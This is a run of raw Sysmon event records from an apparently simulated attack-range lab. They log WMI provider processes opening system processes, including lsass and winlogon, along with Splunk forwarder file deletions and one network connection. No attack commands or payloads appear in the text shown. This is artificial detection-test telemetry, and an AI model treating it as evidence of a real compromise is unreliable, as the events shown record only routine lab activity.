21:43:30.331{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1400-00000000D101}736C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149386Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.331{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1300-00000000D101}1008C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149385Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.331{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1300-00000000D101}1008C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149384Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.331{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1200-00000000D101}960C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149383Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.331{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1200-00000000D101}960C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149382Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.331{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1100-00000000D101}968C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149381Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.331{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1100-00000000D101}968C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149380Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.331{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1000-00000000D101}940C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149379Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.331{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1000-00000000D101}940C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149378Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.331{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0F00-00000000D101}928C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149377Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.331{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0F00-00000000D101}928C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149376Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.331{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0E00-00000000D101}880C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149375Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.331{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0E00-00000000D101}880C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149374Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.331{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0D00-00000000D101}788C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149373Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.331{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0D00-00000000D101}788C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149372Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.331{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0C00-00000000D101}720C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149371Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.331{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0C00-00000000D101}720C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149370Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.331{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149369Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.331{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149368Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.331{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0900-00000000D101}564C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149367Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.331{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0900-00000000D101}564C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000149366Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.252{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2E1AFFAAEA8A6E86CABAC953CE3DC60A,SHA256=61787D8EAC9D933CF6E5318BFEE6AE9CB083551E1992A102277B49433D486BED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104517Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:31.787{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7202A6BDD79BFEAF7EE752A93B8127E1,SHA256=9278F60D9A06E0CF894E3E976604A7195995BE5C8D9D14607055ADC1C67437D5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104516Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:29.720{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55382-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000104515Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:31.108{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27579CD284E6F696926A042A8E03AE29,SHA256=449A5E65E03DDAFF3EA530CE76B5D76F0C194581AA31B82EFD18C51721AC1E95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149501Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:31.648{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6113B0F6EDAE5C7CFFA0BF575D22038,SHA256=8478C87623BCD8E15727DD00090762E88E404A5B46342FDAEC0BBD8A9F31761D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149500Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:31.549{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3968D5164841F97116BF82D7D1C4F179,SHA256=18FFBB1F2A393528507C7564B92892D6A60135BAA66CD36BDC91D621F1CB9395,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149502Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:32.666{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52648B05AFB90A1566F54E02530FDC43,SHA256=FE28D17622B8B15054DC7E3B3C9AC951320E44CE14D19330828D7DDC91EC931B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104518Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:33.160{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE37333491518C754DE54F4DE9774F91,SHA256=E39F7D1E52E31946B8EDF807C1AF2E8B5D5538116B09917BFF08CD8E21141B70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149503Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:33.669{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 